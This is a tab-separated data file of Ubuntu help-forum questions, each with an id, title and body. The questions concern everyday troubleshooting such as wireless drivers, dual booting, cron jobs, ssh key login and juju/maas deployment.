357296	customizing linux kernel	i want to dive into creating custom linux kernels . i recently started using ubuntu and i am impressed with the fact that i can customize the kernel to my own likings . i have been developing apps for different desktop and mobile platforms and now i want learn kernel modding by doing it . there are a few questions i need to clarify : as a beginner what kind of stuff i customize to learn kernel modding ? are there any guides/tutorials for kernel modding for beginners ? regards
357297	setting up workspaces that do n't change in a virtual machine	i really wish i could be more descriptive but i ca n't . i carefully set up my four workspaces so that they contain four , seperate , fullscreen applications , and they work perfectly . and then randomly i switch to one , and it 's my desktop . the three workspaces are just completely empty . what is going on ? update okay , the other windows have n't dissapeared , but they all move to the top-left workspace , and are all fullscreen and are all hidden underneath each other . absolutely maddening . update i think this has to do with vmware player . i 'm running ubuntu as a vm . when switching between the 'windowed ' and 'fullscreen ' modes of vmware player , ubuntu 's workspaces are completely scrambled . how can i prevent this from happening ?
357300	color- perfil only used by the administrator	i 'm using ubuntu 12.0.4 lts . i have calibrated the monitor with spyder 3 and it 's working properly for my user ( admin ) . i want to use the same color perfil for the others users ( not admin ) but it 's not working , system does n't load the perfil correctly . i have clicked option `` set for all users '' ( establecer para todos los usuarios in spanish ) in the color setting window , but it only works if i login to the system and later this , i change to other user . in this case it 's working , but if the other user login alone to the system , color of the monitor is wrong . can someone help me with this ? thanks .
357301	what are the ubuntu `` well-configured defaults '' ?	i often see ubuntu referred to as having `` well-configured defaults '' or `` sensible defaults '' ( such as , among other places , in a couple comments on this question , debian stable vs ubuntu lts for server ? ) in regard to its use as a server operating system . what are these `` well-configured defaults '' ? and , how do they differ from other distributions , for example , debian ? what do they contribute to security or stability ? thank you .
357302	deleting crap necessary ?	in windows there were many crap files that inflated the system ( like temp , browser temp , update fragments , old update files and so on ) . so in windows there were tools like ccleaner really needed . what about ubuntu ? are there such tools also needed ? or does ubuntu delete such files automatically ? if such a cleaner is needed ( or useful ) , what cleaner do you recommend ?
357303	gvfs gphoto2 and ptp camera with ubuntu 12.04	ubuntu 12.04 connects to my canon 700d ( only ptp , no msc mode ) and opens a folder like `` gphoto2 mount on usb [ 001,001 ] '' and seems to be mounted on ~/.gvfs/ i can download photos from that folder but i ca n't upload/create a file in this folder . any idea why i ca n't do this ? is there a special setting for this ? when i browse or copy the files in the gvfs/gphoto2 folder the file 's time stamp is two hours . if camera and pc have 9:00 then the image file shows 11:00 . if i take the camera sd card into the card reader the file shows the correct time , so the issue seems to be related to gvfs-gphoto2 . pc and camera are set to the time zone gmt+1 ( paris ) +dst , so 2 hours in total . is there a setting to change this behaviour ? i do n't need gphoto2 , so if there is a way to mount a ptp camera as a normal usb device i would be happy as well . thanks !
357305	where can i download the latest version of ubuntu for a powerpc ?	where do we download the most current ubuntu version for powerpc mac ?
357307	ubuntu and vmware player	so im trying to download vmware player on my ubuntu 12.04 laptop and i am using another website to help with the download ( http : //www.webupd8.org/2012/06/how-to-install-vmware-player-in-ubuntu.html ) and i get stuck at entering the chmod command in the terminal , it says : hpnerd @ hpnerd-cf-52ajchdbm : ~ $ chmod +x vmware-player-4.0.3-703057.i386.bundle chmod : can not access `vmware-player-4.0.3-703057.i386.bundle ' : no such file or directory and i also downloaded a storage device manager that was an answer to another question that was related to vmware but so far its not working . please help or if you have a better way of installing vmware player . thanks !
357308	how can i to force apt-mirror to produce more detail ?	i 'm using apt-mirror to copy all package in some repository and make my own local repository . but there is a problem . apt-mirror does not make enough information about what is it doing or what it was done . it just show amount of packages will be downloaded and number of them . no detail about what it is downloading or download speed or ... . how can i force it to make more detail ?
357309	how to deploy multiple juju services on the same server with maas	i have 6 services that i need to deploy with 5 physical servers . would it be ok to deploy juju gui with haproxy ? how would you deploy multiple services to one server . i saw some documentation for deploying to same server but they were for openstack and i could n't find anything for maas . i have tried both juju deploy -- to 0 and juju deploy -- force-machine 0 i get unrecognized arguments .
357317	how to get a bootable disk ?	i 've copied ubuntu-13.04-desktop-i386.iso to a cd-r disk and put it into my pc . when i set the bios to boot from the ide cd-rom device and try to start the machine i get the message : `` strike f1 to retry reboot '' and `` no boot device available. '' . is the file i 'm trying to boot from a `` bootable '' file ? what am i doing wrong ?
357319	how to reverse mouse cursor direction ?	i need to change mouse cursor movement direction in horizontal ( x ) axis - moving hand with mouse to left should show mouse cursor moving right . i 'm using ubuntu 13.04 with gnome and lxde . i am looking for system-wide and/or per-user configuration .
357320	can i use ubuntu vdi to run gpu intensive windows video games ?	i have a bunch of kids ( 5 ) , and a bunch of laptops ( total of 7 including mom & dads ) . my video games ( civ v , xcom ) run pretty slow on our laptops ( amd a quad core , 8gb ram , 512 mb onboard ati 512 mb video , $ 350 cheap laptops ) connected via wireless lan to fios . rather than buying new laptops , i was considering building a tower and installing ubuntu to host multiple vdis for each kid on their own laptop . this would theoretically move the cpu and gpu work off the laptop and onto a box i build that is more suitable ( and cheaper than buying a bunch of new laptops . the tower i am thinking of building would look like this : amd fx 8320 8 core , 16 gb 1600 ghz ram , saphire radion hd 7870 2 gb 256 bit , sata iii hd . i am familiar with esxi from work , but almost totally ignorant about ubuntu . my questions : will ubuntu vdi use the gpu of the tower effectively and run windows games well in multiple vdis ? will this configuration take advantage of multiple gpus ( if i chose to buy a 2nd or third gpu ) configured with crossfirex ? do i have to buy a windoze license for each vdi to be legal ? the kids games and school software all run on windows only . does anyone know of a vdi server that already does this , so that i do n't have to build one . i would gladly pay a few dollars a month to use a vdi with some gpu horsepower .
357322	can maas cluster controller be on a vm	i have limited number of servers and since it is a small setup it would be a waste to have a server dedicated to the cluster controller . i was wondering if it can be installed on a vm on my laptop so whenever i make changes i just turn it on and use it . if that is possible could the cluster controller be moved to a physical server later when the environment gets larger ?
357323	error while make	make all-recursive make [ 1 ] : entering directory `/home/danial/desktop/trilearn_base_sources-3.6' making all in src make [ 2 ] : entering directory `/home/danial/desktop/trilearn_base_sources-3.6/src' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/danial/desktop/trilearn_base_sources-3.6/src' make [ 2 ] : entering directory `/home/danial/desktop/trilearn_base_sources-3.6' make [ 2 ] : leaving directory `/home/danial/desktop/trilearn_base_sources-3.6' make [ 1 ] : leaving directory `/home/danial/desktop/trilearn_base_sources-3.6' when i want to make after configure this error show how can i solve it plz help me
357325	boot disk suddenly `` unallocated ''	very strange thing has happened . i just started my computer and got a `` no such partition '' error along with the grub rescue prompt . computer is a thinkpad 430s , with a main ssd ( /dev/sda ) for linux ( ubuntu 13.04 ) and an m-sata ssd ( /dev/sdb ) with windows . i was able to boot into windows by changing the boot order . i then loaded ubuntu from a usb drive ( in test-ubuntu mode ; running that now ) and looked at the disks with gparted and disks . both show /dev/sda as unallocated . many questions : -- what could cause this ? -- is it possible to rescue the partition ? should i try ? -- or should i just reinstall ? i have a recent enough backup to make this not too much of a hassle . thanks for any advice before i do anything hasty ...
357326	determine how long the server was off , when it off and when it back on	is there an application i can install on my server so as to know ( be notified ) that server has gone off and for how long it was off and also know the time it went on again . am trying nagios but cant figure out that option . better still an application to indicate network usage by graph between give time intervals and store logs for reference
357327	can i open ms office powerpoint presentations in ubuntu ?	if i install ubuntu can i load and use my original microsoft powerpoint presentation on the ubuntu os and use the slideshow features to give a presentation ? is it also possible to easily convert the microsoft powerpoint presentation into the ubuntu format and present it that way .
357328	can juju detect down service ?	i would like to have a mysql separated on two servers with one being a master and the other a slave . can juju detect if the master is down and promote the slave or would i have to do it manually ? ok after playing around with this a little more i realized that adding a mysql unit is not the same as adding a mysql slave . in the gui it shows multiple instances of mysql not slaves with relationship with master . what are these units that are being added ? backups or slaves ? if they are slaves how can you tell which unit is the master ? if the master reboots does one of the slaves become master ?
357329	fireworks cs6 fix/alternative with css propertis panel	can anyone tell me how to get fireworks cs6 working on ubuntu using wine or give an alternative that hass the css properties panel thats all i want . macromedia 8 works well but it dosnt have that panelif it did i would be set . so if yo can tell me how to integrate the css properties panel in macromedia 8 that would also be nice
357331	how can i get the vice c64 ( commodore 64 ) emulator to work	i want to play games on the vice emulator on ubuntu 14.04 . i have never managed to get vice working in ubuntu.what are the steps needed to achieve this ?
357336	script wo n't run properly in crontab , no path or permission problems	i use the geany text editor , which has a command line option to list all open documents . the following command works fine when run from the command line : /usr/bin/geany -- list-documents > /home/myname/geanylist.txt i want to run this regularly in cron , but it does not work . i have tried : putting the above command directly into my crontab wrapping the above command in a bash script , and calling that in my crontab defining all normal path and other environment variables in the script copying the entire contents of my .bashrc into the script redirecting stderr and stdout to a log file ( no help ) no matter what i do , when the crontab runs , ~/geanylist.txt will not contain the output from geany -- list-documents , though it will contain any other output generated by the script . i am at a loss . how can i make this work ? is there another system utility besides cron i can use that will let me do this ? the best solution i can think of is to create a script with a loop that runs the command and then sleeps for 24 hours - surely there is a better way ? edit : the result of /usr/bin/geany -- list-documents , when run from the cl , is a list of full paths to ( usually ascii txt ) files , one per line , on stdout . when adding the command or script to my crontab , i use crontab -e , with $ editor set to nano . this is the same way i have added many other commands to my crontab , all of which work properly ( none of these other commands attempt to run geany in any way ) .
357337	can i add âopen in terminalâ to the right-click mouse menu in lubuntu ?	in vanilla ubuntu , there is a quite useful application called nautilus-open-terminal , which allows the user to open the terminal in any folder by simply right-clicking and selecting `` open in terminal '' . lubuntu uses pcmanfm , not nautilus , so installing this program would be useless . is there another way to achieve this right-click option ?
357339	how to fix ubuntu 12 to windows 7 network connection ?	i am having some trouble with my ubuntu pc that it will not cummunicate with one of my pc 's on my network . i have several pc 's on my network and i can see and access all of them but one . i have tried manual setup of the pc communication with connect to server and am still getting the same error of is can not mount the windows share . the part that has me very confused on the whole issue is the fact that i can work with and get files from all my other pc 's on the network with no issues at all . any help on this subject i would be greatful . i have been all over the place from ubuntu live chat and other forums and just about every where i can think to go and can not find a resolve to this one issue . i can provide any information that may be needed in the resolve of this issue . i have already checked on the firewall settings and even shut them all down on the pc in question and then also configured them to add the exeption for the communication all with no resolve . getting the same error every time . i have went in a check configuration of samba and even wine and still no avail still not able to get or see the files from only one of the pc ; s on my network . i even tried to manually configure the communication with connect to server with ip address and still the same thing . i can see the pc in the nautilus but it gives error of can not mount and then not able to find share list . i know the pc has the sharing enabled and network sharing enabled as i can see and get the files from the other pc 's in the network . any help would be grateful . i can provide any info i need to help get this issue resolved .
357346	can not import gnuradio . is python set correctly ?	when launching gnuradio companion it gives this error message : can not import gnuradio . is the python path environment variable set correctly ? all os : pythonpath is the library path environment variable set correctly ? linux : ld_library_path windows : path macosx : dyld_library_path i do have python 2.7.3 installed . i installed gnuradio using binaries .deb file from the website below : : : : http : //ettus-apps.sourcerepo.com/redmine/ettus/projects/uhd/wiki/gnuradio_linux i do not think the problem from gnuradio something it should be done with those libraries ...
357348	recorded program does n't show on `` watch recordings ''	i recorded a program ( from antenna ) last night . the show recorded , but it is n't listed under media library / watch recordings . it is listed under manage recordings/ previously recorded . it is in red text followed by `` a '' , which apparently means aborted . however , i can find the recording file over my network , and watch it from my desktop pc . it recorded the full hour , about 8gb . how can i get mythtv to recognize that this was a successful recording ? i think this has happened to some other recordings recently . however , other recordings came out fine . i 'm running version 0.26 of mythbuntu .
357349	how to find out boot reason ?	i need to know if machine was started by power button , reset , woken on lan package or rtc alarm . i 've found that dmidecode -- type system should show this info , but it does n't . i need it there : https : //bugs.launchpad.net/wakeonplan/+bug/1239212
357354	samsung series 9 np900x3a no wifi internet	the connection is established but there is no internet connection at all . my nic is a intel ultimate-n 6300 . sometimes it connects but very slow ! i 'm not really sure what commands i have read will work .
357355	windows 8 failed to boot - dual boot ubuntu	can someone help me with this ? i installed ubuntu 13.04 alongside windows 8 . ubuntu boots perfectly , but when i select windows 8 from the grub bootloader , i get the following error message : error : device format `` ldm/94094a20-f13b-11e0-808c-005056c00008/volume1 '' invalid : must be ( f|h ) dn , with 0 < = n < 128 press any key to continue ...
357356	make backspace go back in chrome	i just started dual booting ubuntu 12.04 lts recently and so far the only thing i do n't like is when in chrome the backspace does n't go to the previous page like it did in windows . how do i change the shortcut from alt+left to just the backspace button ?
357357	can not change language to galician	i have a problem . at a fixed ip network i could n't connect during installation , so i had to choose english as default language , now i ca n't change it to galician . with a laptop at home dynamic ip , as i could connect to wifi before installing i could choofse galician no problem . i have tried the usual stuff : language center , add languages , several updates , but to no effect , language in lubuntu stays in english . what can i do ?
357358	toshiba satellite windows 8 dual boot installation is not working	system info : • toshiba satellite p856-s5312 • windows 8 • intel core i5 cpu • 688gb hdd • 6gb ram i want to use both ubuntu and windows for a time . i burned ubuntu 13.04 to a dvd , and figured out the secret to changing my boot order so i can boot from the dvd . the program works as a live dvd , but when i go to install it , it does n't give me the option to install ubuntu alongside windows ... like the screenshots on the website show . i did notice that the screenshots are for windows 7 . i 'm not quite technically knowledgeable enough to partition it without help . please help .
357360	how to deal with kernal panic while booting off a flash drive ?	i 'm running ubuntu-12.10-desktop-i386 off a flash drive and when i try to boot up it goes to a blank ubuntu screen for a bit , runs a little , then comes back with this error : pid : 1 , comm : run-init not tainted 3.5.0-17- generic # 28-ubuntu . there 's some more text but towards the end it says : kernel panic - not syncing : attempted to kill init ! exitcode =000000100 panic occurred , switching back to text console . from there it looks to be hung , but i 'm not sure . how can i resolve this ?
357361	how to add a specific keyboard layout in lxde ?	i 'm using ubuntu 12.04 with unity and lxde . i use a phonetic keyboard layout to write bengali in unity . now , i want to use lxde , because of its better performance on my pc , but problem is that , i ca n't get that specific layout on lxde . how can i get that on lxde ?
357362	how to use ubuntu with read-only file system ?	the question is : what directories of file system i should consider to be mounted as ro ( as maximum as possible ) , and what as rw to use ubuntu as normal ? i want to flash as maximum directories as i can to unerasable ultra-fast storage . upgrading and other stuff is not normal : )
357364	second hard drive to be mouunted as /home/videos	i am wanting to know if i can make my second hard drive be the videos folder that is in my home dir . if so please tell me how . mainly when i click on the videos folder i want it to show me the stuff on the 2nd drive ( my videos ) is this an edit to my fstab and that is it or is their a symbolic link trick i need to do , i really dont want to mess around too much due to possibly loosing all my videos . the big thing is i want plex be able to use it as well .
357367	are ubuntu packages haswell-optimized ?	i was looking at the new features in the intel 4xxx haswell cpus , it looks like there are new optimizations like avx2 , and aes instructions for fast encryption . is this something that you must compile manually to benefit from , or will we benefit from these features by default in 13.10 / 14.04 ?
357371	is it possible to download ubuntu without pre-installed applications ?	i am asking if there is a way to install ubuntu with just the os ( and maybe a simple browser ) . the reason i am asking about this is i get frustrated with the application set included with the install cd . i use lts but i do n't want to be stuck using the same office applications , or browser for two years . i do n't feel adventurous enough to re-install the entire os every six months , but i would like to get updates to my applications when then are released or if not right when they are released , then in a reasonable time thereafter . when 12.04 was released you included libreoffice which was fine but now there is a newer , more stable version of the software . i notice that with the applications included on the cd , you lock that release of the os to those versions of the applications . however , with other software in the software center , you allow the user to upgrade to the newer version easily . does n't it make sense to do that with all the applications ? as it is now , if i want the newer version of an office application , i have to install openoffice in the terminal .
357372	first time ubuntu 12.04 install on dell insprion 1545 will not get wireless	can u give me step by step do n't know sudo or all this code talk just trying to get on internet my ethernet not working also all help needed
357375	youtube showing horizontal lines when full screen in google chrome	first , im new in ubuntu so please bear with me . my google chrome shows strange behavior when playing youtube videos in full screen mode . there will be some horizontal white lines , which is exactly like when you playing the game without the vsync . i 've checked firefox and the videos working perfectly in there . i also tried to play videos from my hdd using vlc player and its working fine . it seems the problem is in the google chrome alone . my version of ubuntu is 13.04 , my laptop is asus n46vz and i use the latest release of google chrome . i 've tried to ask google , but it seems he has no answer . thanks for your time : d
357376	déjà dup backup to ubuntu one fails with the error `` backup location too small '' , but only 1.9 gb has been used in my backups on ubuntu one	i am running ubuntu 12.04 using déjà dup backup to ubuntu one with the free 5 gb storage , it has suddenly started failing with the error `` backup location too small '' . but when i checked my backups on ubuntu one , they only take 1.9 gb . apart from subscribing to extra storage , what are my options ?
357378	firefox issues in ubuntu 13.04 64bit	first , im new in ubuntu so please bear with me . my firefox used to be working normally for the first time i installed ubuntu 13.04 . i dont feel did anything wrong , but it suddenly cant be opened via the launcher . when i tried to type `` firefox '' in the terminal , it shows the very same error like this question . so , i followed the answer in that question , and voila ... its working now : d however , something is still bothering me . why is this happened suddenly ? the fact that i used chown to make it works again means that the owner of the firefox is changed . and why this message is still appearing in the terminal although the firefox is working now : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed thanks for your time : d
357379	how is my windows share not accessible after some time after being mounted at boot time ?	i am using ubuntu 12.04 and i have set up a windows share to be mounted at boot time in /etc/fstab as follows : //192.168.x.x/google\040drive /home/myname/google\040drive cifs username=winuser , password=winpass , uid=1000 , iocharset=utf8 0 0 everything works right after boot . however , after some time ( about 20 or more minutes ) the mounted share is no longer accessible . any attempt to access the share freezes the machine for about 5 minutes . interestingly the mounted share then becomes available after the freeze . can someone please help me understand what is going on ?
357381	ca n't configure konsole transparency over background image ?	i can make the background transparent ( so the window behind shows through -- generally annoying and useless ) , and i can set a background image , but i ca n't adjust the transparency over that background image . i ca n't tile/center/stretch the background image either . is my configuration broken , or does konsole just not support such things ? if not , what terminals do ?
357388	is ubuntu training available ?	are there any courses on ubuntu for beginners ? i would like to replace windows 7 , but see that a few users are having trouble booting ubuntu .
357389	what should i do with this apparently redundant swap partition ?	i have a machine running ubuntu server on an encrypted lvm , with an encrypted swap partition . after i unlock the lvm during boot , i get this message : the disk drive for /dev/mapper/ < hostname > -swap_1 is not ready yet or not present . this stays up for twenty seconds or so , then i get the normal login prompt . immediately after i log in , swapon -s shows that a different swap partition is active : filename type size used priority /dev/mapper/cryptswap1 partition 2428924 0 -1 /etc/crypttab has no mention of < hostname > -swap_1 , only cryptswap1 . /etc/fstab has identical lines for both ( besides the name field ) . given that cryptswap1 seems to be working fine on its own , is just getting rid of < hostname > -swap_1 the best thing to do ? and how exactly would i do it ?
357390	ubuntu 13.04 root hack/ipod access	a few weeks ago i managed to find an exploit in ubuntu 13.04 that allowed me access to a root shell . i was looking around on an exploratory expedition and found a directory in the root folder entitiled `` libimobiledevice '' with a group of .pem files ( my ipod touch 4g 16gb was connected when doing this ) . now i had found an app which allowed me to bypass the whole `` i ca n't load music without itunes '' thing , but on a past update in ubuntu 13.04 , i can not seem to add files anymore to my ipod . i have looked around and the closest explanation that i can come up with is that canonical has cut off access to the .gvfs folder . when i look into `` libimobiledevice '' , i see a three categories of .pem files . the first one is named after the ipod 's serial number . the next two i would call root and host authentication credentials ( specifically '' rootcertificate.pem '' , `` hostcertificate.pem '' , et al. ) . i do not have the experience in cryptography to make much sense of the limited information that i can find on the internet concerning root and host certificates . does anyone know if this would allow me access to my ipod again ?
357392	youtube batch uploader with gui ?	i 'm searching for a youtube batch uploader for ubuntu and i ca n't find anyone . windows have a lot of softwares like that , but in ubuntu i ca n't find anyone . i already see this question and this do n't helped me , because i searching for a gui tool , not a command-line tool . so , i want know if exist any softwares for ubuntu that do this thing .
357393	wireless not working , no driver showing in the additional drivers window	i am a new user of ubuntu . i have a asus q501l laptop that came preinstalled with windows 8 , but i wanted to move from windows and try something new , so i just decided to install ubuntu without thinking to much about it . the problem i have is that i ca n't install the additional drivers . when i go to to additional drivers nothing appears , it just says : no proprietary drivers are in use and in small letters continues : a proprietary driver has private code that ubuntu developers ca n't review and improve . security and others updates are dependent on drivers vendor.. i ca n't even use the wireless connection . i really do n't know what to do . i tried to download the drivers from asus , but when i tried to install them it said : an error occurred while loading the archive . also i do n't know the model of the pc wireless card . if there is something i can do to find out that please tell me . thanks !
357396	having problems logging in with ssh rsa keys	i 'm trying to login to my ssh server using rsa keys , but i 'm having problems . i 've created the keys and copied them onto my server , and put them in the authorized_keys file . however , when i try to ssh into the server , it still asks for my password . i 've run ssh -v [ ip ] on my local machine to get the debug info , and it says host [ ip ] is known and matches the rsa host key . found key in users/peter/.ssh/known_hosts:11 ssh_rsa_verify : signature correct ssh2_msg_newkeys sent expecting ssh2_msg_newkeys ssh2_msg_newkeys received roaming not allowed by server ssh2_msg_service_request sent ssh2_msg_service_accept received authentications that can continue : password next authentication method : password after this it continues to prompt me for my password . are the ssh keys even working at all ? what have i done wrong ? thanks , peter
357399	letting the users of my application select whether the app should start on login . most cross-platform way to implement ?	i want to let the users of my application control whether the application should run at every user log-in , lets say , by activating/deactivating a check-box within the app . ( dropbox does this for instance . ) what is the best way to implement this ? i 'd prefer for the implementation to function on most linux environments ( i.e . be as cross-platform as possible ) . also , it would be nice if the user did n't need to become root to change this setting .
357400	how to set my wireless card into ap mode ?	i 've been trying to create an access point using hostapd , but i get an error message saying that my card does n't support ap mode . i tried sudo iwconfig eth1 mode master and i get the following error : error for wireless request `` set mode '' ( 8b06 ) : set failed on device eth1 ; invalid argument . how do i get ubuntu to recognize the card 's ap mode function ? because it clearly supports access point mode as it works perfectly with connectify on windows . my card is : 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 )
357403	how to update thunderbird to latest version ?	i have ubuntu 13.04 and my thunderbird version is 24.0 . now mozilla released 24.1 . how can i update to it ?
357405	intel centrino wireless n 2230 driver problem	i have intel centrino n 2230 wifi card and i tried to download iwlwifi tar from ubuntu wireless drivers and then i copied its .ucode to firmware folder and then i ran modprobe -r lawgn and modprobe lawgn . it did n't run , even after restart . then i updated the compat-drivers but still did n't work . i tried rfkill unblock all , checked the button , etc . but it did n't show up in airmon-ng and iwconfig . can anyone kindly help ? this is the output of mine : lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:07:00.2 logical name : eth0 version : 0a serial : 28:92:4a:1d : af : a1 size : 100mb/s capacity : 1gb/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.3 latency=0 link=yes multicast=yes port=mii speed=100mb/s resources : irq:41 ioport:2000 ( size=256 ) memory:61404000-61404fff memory:61400000-61403fff *-network unclaimed description : network controller product : intel corporation vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory:61500000-61501fff iwconfig lo no wireless extensions . eth0 no wireless extensions . airmon-ng interface chipset driver lsb_release -a ; uname -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.2 lts release : 10.04 codename : lucid linux bt 2.6.38 # 1 smp thu mar 17 20:52:18 edt 2011 i686 gnu/linux
357407	how to set front mic boost to zero in alsamixer ?	i am using ubuntu 13.04 . for skype calls , i 've found everyone experiencing a lot of static from me . going through my alsamixer , i 've found lowering my front mic boost solves everything . however , i have two issues with this : front mic boost will never be set to 0 , it stops at 22 the boost automatically gains itself how do i solve these issues ?
357410	wireless unavailable after upgrading network manager	after upgrading packages in ubuntu 12.04 lts , wireless in not working . it shows that wireless is unavailable . $ sudo iwconfig lo no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on eth0 no wireless extensions . how do i make ubuntu detect my wireless connection ?
357411	zte modem and ubuntu 13.04	i have a zte modem and i checked using the following command : lsusb that the vendor id and the product id are respectively 0x19d2 and 0xffe9 . i am told that this modem mounts both in the cd ( zerocd ? ) mode and the usb storage mode . however , i am not able to figure out how to unmount the zerocd and start the usb modem . can anyone help me with specific steps using usb-modeswitch and other settings to set up my modem connection ?
357412	list saved networks from terminal	i 'm starting to learn terminal commands and i have one question . how can i see the list of saved networks from terminal ? if i go to : /etc/networkmanager/system-connections i can see the saved networks listed , but i want use this in a shell script - i 'll need this networks listed as a string ( or another unique attribute of each network ) . so i want know : there 's any other command to list all saved networks from terminal ? if not , how can i store this unique attribute of each of this networks in shell script ?
357413	no wireless after installing 12.04	i have been working on this for 3 days now . i am not an ubuntu user by choice , but am trying to get it working on a dell latitude 1200 . when it was running 9.04 wireless was fine . i upgraded to 12.04 so that i could upgrade firefox . i have tried every possible command that i have been able to find regarding installing broadcom sta driver . i really do n't understand how i ams supposed to use a wired connection-i do n't have one . my device is working , but when i do a iwconfig command i get lo no wireless extensions , and eth0 no wireless extension . there is no wlan shown . please explain in detail what to do . i am not a programmer at all and do n't wish to be . help !
357415	how to solve video and mouse issues on hp pavilion a288n ?	i am trying to get an hp pavilion a288n desktop to run 12.04 , but display is bad and mouse acts like an 'eraser ' . it has an integrated prosavageddr ( km266 ) graphics card . i 'm running already windows xp on it with the latest driver from s3 ; sp23964 ( via/s3 graphics driver v6.14.10.0012 update ) . however , xp has no problem .
357417	why is grub loading instead of ubuntu menu from memory stick	ok , so i have a new hp amd a6 laptop that i 'm attempting to dual boot on alongside windows 8 . i 've used yumi to put the 12.04 iso on a memory stick . i 've got all the bios and windows settings down pat for booting off the stick . on this laptop , when pulling up the bios/repair screen via esc , i get a menu option for booting an emi file . i choose the bootx64.emi on the `` e '' drive , which is the memory stick . it loads up grub every time . for variety , i tried choosing the grub emi , but it also , sensibly loads grub . i have not been able to load the ubuntu menu through grub via the `` right shift , '' it may just load up to quickly . i probably need to be pointed in the right direction for the correct grub command . i tried just letting the stick load instead of windows via the bios menu settings , but so far no luck that way . i 've turned off fast load already . the emi boot menu option seems to be the right way to go , but i may be missing a file .
357421	fuzzy launcher after wakeup from suspend	i am new to ubuntu , using the nvidia 'version 310 ' proprietary graphics driver . every time i wake the system from suspend , i get a fuzzy launcher with geometric artifacts . after hovering the mouse over it , everything goes fine and remains fine too . this is how my desktop looks after resuming from suspend :
358414	what does module load do ?	what exactly module load does ? is it basically that instead of going through the directory her i have seen people do module load gcc/versionnumber etc .
358415	ca n't play new redbox bluray rentals	i can get my old blu rays to work . but all the new redbox stuff wo n't play in vlc . here is the error i 'm getting . blu-ray error : your system aacs decoding library does not work . missing keys ? your input ca n't be opened : vlc is unable to open the mrl 'bluray : ///media/star_trek_into_darkness ' . check log for details . this makes me sad . i hate the drm world . i 'm playing on a pieced together drive i made for $ 20 . as stated before , unencrypted and older blu ray 's work just fine .
358417	configuring ubuntu to use ssd drive	i 've just installed 12.04 lts on my envy 4 laptop and i 'd like to make use of the ssd for my boot partition . can anyone provide information on how to configure the raid from within ubuntu ; and how to move my /boot to the ssd .
358420	installation was stuck after the partitioning screens have gone by , now no os or any partitions on my hard drive	i 'm in a sticky situation . here 's the scenario : i have been trying to install ubuntu mini 13.04 on my dell latitude d810 laptop , but i get stuck after the partitioning screens have gone by . now here 's the real problem . i have no os on my hard drive or any partitions . and i put my hard drive into an external hard drive , and it wo n't read . so here 's my question : how do i format my hard drive so i can install ubuntu ?
358421	is there any way to set a greeting message in ubuntu ?	i love a quote . now i want every time my computer starts , the quote to be on the screen , like a welcome note.is there any way to do that in ubuntu 13.04 ?
358426	how to uninstall linux dual boot with windows ?	i installed kali linux ( debian distro ) dual boot with windows 7 but there were some damages with the iso file i downloaded so kali did n't install correctly , please how do i uninstall kali dual boot with windows ? and how to completly uninstall grub ? i mean when i boot my pc computer directly boots into windows cuz i 'm gon na redownload the iso file and reinstall kali on my pc thank you in advance
358427	how do i change the text color of items displayed in the unity dash ?	i 'm using ubuntu 13.04 raring ringtail with the malys-uniblack icon theme ( the icons are black ) . also i 'm using a theme called mediterraneanlight . i think it looks very nice . i have the launcher color set to a light grey color/almost white and so the dash follows suit and has the window background set as the same color . i have it set this way so that the icons themselves show up nice and bold . however , this creates the problem of me not being able to read the text that is displayed below the icons because it blends in with the light background color . how do i change the text color of items displayed in the unity dash ? . thank you for your time and let me know if you need any more information other than what i 've already provided . thanks .
358429	( in gnome ) ktorrent `` open folder '' starts banshee	ktorrent once used to ask me what program to use ( and i could tell it to use nautilus ) , but now it only ever opens banshee ... which is less than useful . can anyone tell me how to explain to its tiny kde brain that i want to use nautilus to browse a folder ? edit : after belatedly checking ~/.local/share/applications/mimeapps.list it did only list banshee and vlc for inode/directory , though why this is so is a mystery . after changing the setting ktorrent then once again asked me for a choice of program and i could check the âremember this choiceâ checkbox .
358441	how to use sed with this complex expression of special chars and ips ?	how to use sed to replace for example this expression : connection = sqllite///keystone @ 10.10.10.51 with this expression connection = mysql : //keystoneuser : keystonepass @ 10.10.10.51/keystone
358447	does ubuntu comes with mate flavor ?	i know about linux mint , but is there any 'ubuntu ' out there with mate ?
358450	cancelling/undo apt-get commands	my friend suggested that i upgrade my ubuntu 12.04 to 13.04 i used these commands in a terminal : sudo apt-get update & & sudo apt-get dist-upgrade & & sudo apt-get autoremove then i think my 12.04 does n't have a problem and is stable , and is supported until 2017 . so , how would i cancel the command .
358460	running adb via wifi on ubuntu 13.04	first , im new on linux so please bear with me . i have a rooted android phone and i was able to run the adb via wifi network on windows , where i just need to go to the adb 's directory and type adb connect . however , i ca n't just do that in my ubuntu . everytime i enter adb connect , the terminal always said that i dont have the adb and i must install it . when i check the adt bundle ( i downloaded the bundled one from here ) , i can see the adb is there inside the platform-tools folder . i already tried to change the directory to the platform-tools and run the adb connect from there , but its still not working . do i need to install the adb again via terminal ? or did i miss something ? you may be wondering why dont i just download the adb ( again ) via terminal and do trial and error ? the answer is because i dont have a good internet connection , so i want to avoid unnecessary downloads . thanks for your time : d
358462	how do i automatically change to a specific folder on login for an account with no home folder ?	typically i would create a user account and in the home folder , place the cd command in the ~/.bashrc file . for system users , however , with on home folders , the /etc/bash.bashrc file is used instead and with multiple system users i need a more conditional approach . can the /etc/bash.bashrc file know which user is executing it , and change directories on login based on which user i 've logged in as ? these system users are never logged in as remotely , only using su .
